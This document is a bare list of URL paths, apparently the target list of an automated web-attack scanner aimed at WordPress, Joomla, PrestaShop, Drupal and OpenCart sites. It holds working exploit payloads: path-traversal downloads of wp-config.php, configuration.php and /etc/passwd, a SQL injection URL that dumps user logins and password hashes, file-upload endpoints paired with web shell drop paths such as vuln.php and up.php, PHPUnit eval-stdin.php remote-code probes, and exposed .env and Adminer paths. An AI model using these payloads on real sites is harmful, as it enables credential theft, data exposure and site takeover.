'/admin/index.php?route=setting/setting&user_token={}'
'/admin/index.php?route=marketplace/installer/upload&user_token='
'/admin/index.php?route=setting/setting&token={}'
'/admin/index.php?route=marketplace/installer/upload&token='
'/administrator/index.php'
'/wp-includes/ID3/module.audio.ac3.php'
'/user/login'
'/wp-json/wp/v2/users/'
'/author-sitemap.xml'
'/wp-login.php'
'/wp-admin/'
'/components/com_facileforms/libraries/jquery/uploadify.php'
'/components/com_facileforms/libraries/jquery/up.php'
'/components/com_facileforms/libraries/jquery/'
'/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table='
'/administrator/components/com_extplorer/uploadhandler.php'
'/images/stories/'
'/images/stories/up.php'
'/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=vuln.php'
'/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/vuln.php'
'/index.php?option=com_cckjseblod&task=download&file=configuration.php'
'/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php'
'/administrator/components/com_bt_portfolio/up.php'
'/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../vuln.php'
'/components/com_b2jcontact/vuln.php'
'/administrator/components/com_alberghi/upload.alberghi.php'
'/administrator/components/com_alberghi/'
'/index.php?option=com_adsmanager&task=upload&tmpl=component'
'/tmp/plupload/'
'/wp-content/plugins/cherry-plugin/admin/import-export/upload.php'
'/wp-content/plugins/cherry-plugin/admin/import-export/'
'/modules/cartabandonmentproOld/upload.php'
'/modules/cartabandonmentproOld/uploads/'
'/adminer.php'
'/wp-admin/mysql-adminer.php'
'/wp-admin/adminer.php'
'/mysql-adminer.php'
'/adminer/adminer.php'
'/uploads/adminer.php'
'/upload/adminer.php'
'/adminer/adminer-4.7.0.php'
'/wp-content/adminer.php'
'/wp-content/plugins/adminer/inc/editor/index.php'
'/wp-content/uploads/adminer.php'
'/adminer/'
'/_adminer.php'
'/mirasvit_adminer_mysql.php'
'/mirasvit_adminer_425.php'
'/adminer/index.php'
'/adminer1.php'
'/mirasvit_adminer_431.php'
'/mirasvit_adminer-4.2.3.php'
'/adminer-4.6.2-cs.php'
'/adminer-4.5.0.php'
'/adminer-4.3.0.php'
'/latest.php'
'/latest-en.php'
'/latest-mysql.php'
'/latest-mysql-en.php'
'/adminer-4.7.0.php'
'/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php'
'/tmp/up.php'
'/index.php?option=com_myblog&task=ajaxupload'
'/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder='
'/index.php?option=com_macgallery&view=download&albumid=../../configuration.php'
'/index.php?option=com_jwallpapers&task=upload'
'/jwallpapers_files/plupload/up.php'
'/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php'
'/index.php?option=com_jdownloads&Itemid=0&view=upload'
'/images/jdownloads/screenshots/'
'/images/vuln.php'
'/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form'
'/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=156&format=raw'
'/components/com_jbcatalog/libraries/jsupload/server/php'
'/components/com_jbcatalog/libraries/jsupload/server/php/files/up.php'
'/components/com_jbcatalog/libraries/jsupload/server/php/files/'
'/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php'
'/components/com_foxcontact/foxcontact.php'
'/index.php?option=com_foxcontact&amp;view=invalid'
'/components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../'
'/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../'
'/index.php?option=com_foxcontact&amp;view=loader&amp;type=uploader&amp;owner=module&amp;id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../'
'/components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../'
'/components/com_foxcontact/vuln.php'
'/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php?name=vuln.php'
'/administrator/components/com_redmystic/chart/tmp-upload-images/vuln.php'
'/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css'
'/?gf_page=upload'
'/wp-admin/admin-ajax.php'
'revslider_ajax_action'
'client_action'
'update_plugin'
'/wp-content/plugins/revslider/'
'/wp-content/themes/striking_r/'
'/wp-admin/admin-post.php?page=wysija_campaigns&action=themes'
'/?q=node&destination=node'
'/wp-content/plugins/downloads-manager/upload/'
'/wp-content/plugins/downloads-manager/img/unlock.gif'
'/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media'
'/administrator/components/com_simplephotogallery/lib/uploadFile.php'
'/tmp/vuln.php.xxxjpg'
'/components/com_sexycontactform/fileupload/'
'/components/com_sexycontactform/fileupload/files/up.php'
'/components/com_sexycontactform/fileupload/files/'
'/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA='
'/administrator/components/com_rokdownloads/assets/uploadhandler.php'
/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/build.xml'
'/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
'/wp-content/plugins/iwp-client/readme.txt'
'ajax/render/widget_php'
'/wp-admin/admin-post.php?swp_debug=load_options&swp_url='
'/?up_auto_log=true'
'/index.php/component/users/?view=login'
'/index.php/component/users/?task=user.register'
'/configuration.php'
'/index.php/component/users'
'/.env'
'/modules/attributewizardpro_x/file_upload.php'
'/modules/attributewizardpro/file_upload.php'
'/modules/attributewizardpro/file_uploads/'
'/modules/advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%26id_slide=php'
'/modules/advancedslider/uploads/'
'/modules/1attributewizardpro/file_upload.php'
'/modules/1attributewizardpro/file_uploads/'
'/vendor/phpunit/phpunit/build.xml'
'/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
'/sites/all/libraries/php-curl-class/vendor/phpunit/phpunit/build.xml'
'/sites/all/libraries/php-curl-class/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
'/wp-admin/admin-post.php'
'/install/index.php'
'/install/includes/configure.php'
'/install/includes/OsComPayLoad.php'
'/modules/mod_simplefileuploadv1.3/elements/udd.php'
'/modules/mod_simplefileuploadv1.3/elements/up.php'
'/modules/megamenu/uploadify/uploadify.php?folder=modules/megamenu/uploadify/'
'/modules/megamenu/uploadify/up.php'
'/wp-content/themes/headway'
'/wp-content/themes/'
'/library/visual-editor/lib/upload-header.php'
'/wp-content/uploads/headway/header-uploads/'
'/wp-content/plugins/formcraft/file-upload/server/content/upload.php'
'/wp-content/plugins/formcraft/file-upload/server/content/files/'
'/modules/attributewizardpro.OLD/file_upload.php'
'/modules/attributewizardpro.OLD/file_uploads/'
'/modules/simpleslideshow/uploadimage.php'
'/modules/simpleslideshow/slides/'
'/modules/psmodthemeoptionpanel/psmodthemeoptionpanel_ajax.php'
'/modules/productpageadverts/uploadimage.php'
'/modules/productpageadverts/slides/'
'/modules/pk_flexmenu/ajax/upload.php'
'/modules/pk_flexmenu/uploads/'
'/modules/nvn_export_orders/upload.php'
'/modules/nvn_export_orders/'
'/modules/megamenu/uploadify/uploadify.php?id=pwn'
'/modules/lib/redactor/file_upload.php'
'/masseditproduct/uploads/file/'
'/modules/jro_homepageadvertise/uploadimage.php'
'/modules/jro_homepageadvertise/slides/'
'/modules/homepageadvertise2/uploadimage.php'
'/modules/homepageadvertise2/slides/'
'/modules/homepageadvertise/uploadimage.php'
'/modules/homepageadvertise/slides/'
'/modules/fieldvmegamenu/ajax/upload.php'
'/modules/fieldvmegamenu/uploads/'
'/modules/columnadverts/uploadimage.php'
'/modules/cartabandonmentpro/upload.php'
'/modules/cartabandonmentpro/uploads/'
'/wp-content/plugins/barclaycart/uploadify/uploadify.php'
'/wp-content/plugins/barclaycart/uploadify/'
'/wp-admin/admin-ajax.php?action=getcountryuser&cs=2'
'/wp-content/uploads/20'
'/wp-content/uploads/product_files/upload.php'
'/wp-content/plugins/viral-optins/api/uploader/file-uploader.php'
'/modules/wg24themeadministration/wg24_ajax.php'
'/modules/wg24themeadministration/img/upload/'
'/modules/wdoptionpanel/wdoptionpanel_ajax.php'
'/modules/wdoptionpanel/upload/'
'/modules/vtermslideshow/uploadimage.php'
'/modules/vtermslideshow/slides/'
'/modules/videostab/ajax_videostab.php?action=submitUploadVideo%26id_product=upload'
'/modules/videostab/uploads/'
'/modules/tdpsthemeoptionpanel/tdpsthemeoptionpanelAjax.php'
'/modules/tdpsthemeoptionpanel/upload/'
'/modules/soopamobile/uploadimage.php'
'/modules/soopamobile/slides/'
'/modules/soopabanners/uploadimage.php'
'/modules/soopabanners/slides/'
'/wp-content/plugins/cloudflare/vendor/phpunit/phpunit/build.xml'
'/wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
'/wp-content/plugins/category-page-icons/css/menu.css'
'/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php'
'/wp-admin/admin-ajax.php?action=wpuf_file_upload'
'/wp-content/plugins/prh-api/vendor/phpunit/phpunit/build.xml'
'/wp-content/plugins/prh-api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
'/wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/build.xml'
'/wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
'/wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=/etc/passwd'
'/jm-ajax/upload_file/'
'/wp-content/plugins/hd-webplayer/playlist.php'
'/wp-content/plugins/hd-webplayer/playlist.php?videoid=1+union+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11+from+wp_users--'
'wp-content/plugins/eshop-magic/download.php?file=../../../../wp-config.php'
'/wp-content/themes/enfold-child/update_script/vendor/phpunit/phpunit/build.xml'
'/wp-content/themes/enfold-child/update_script/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
'/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/build.xml'
'/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
'/wp-json/wp/v2/posts/'
'/wp-content/plugins/contabileads/integracoes/mautic/api-library/vendor/phpunit/phpunit/build.xml'
'/wp-content/plugins/contabileads/integracoes/mautic/api-library/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
'/wp-content/plugins/woocommerce-software-license-manager/vendor/phpunit/phpunit/build.xml'
'/wp-content/plugins/woocommerce-software-license-manager/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
'/wp-content/plugins/realia/libraries/PayPal-PHP-SDK/vendor/phpunit/phpunit/build.xml'
'/wp-content/plugins/realia/libraries/PayPal-PHP-SDK/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
'/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/build.xml'
'/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
'/wp-admin/setup-config.php?step=2'
'/wp-admin/install.php?step=2'
'/wp-admin/setup-config.php?step=0'
'/wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php'
'/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
'/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php'
'/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php'
'/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=../../../../../../wp-config.php'
'/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes'
'/wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=../../../../../../wp-config.php'
'/wp-content/force-download.php?file=../wp-config.php'
'/force-download.php?file=wp-config.php'
'/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'
'/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php'
'/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php'
'/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=../../wp-config.php'
'/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../wp-config.php'
'/wp-content/plugins/recent-backups/download-file.php?file_link=../../../wp-config.php'
'/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=../../../wp-config.php'
'/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
'/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../wp-config.php'
'/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php'
'/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php'
'/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php'
'/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=../../../../../wp-config.php'
'/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php'
'/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php'
'/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'
'/wp-content/plugins/mac-dock-gallery/macdownload.php?albid=../../../wp-config.php'
'/administrator/index.php?option=com_templates&view=templates'
'/wp-admin/plugin-install.php?tab=upload'
'/wp-admin/update.php?action=upload-plugin'
'/wp-admin/theme-editor.php?file=search.php'
'/wp-admin/theme-editor.php?file=search.php&theme={}&scrollto=0'
'/wp-admin/theme-editor.php?file=search.php&theme='
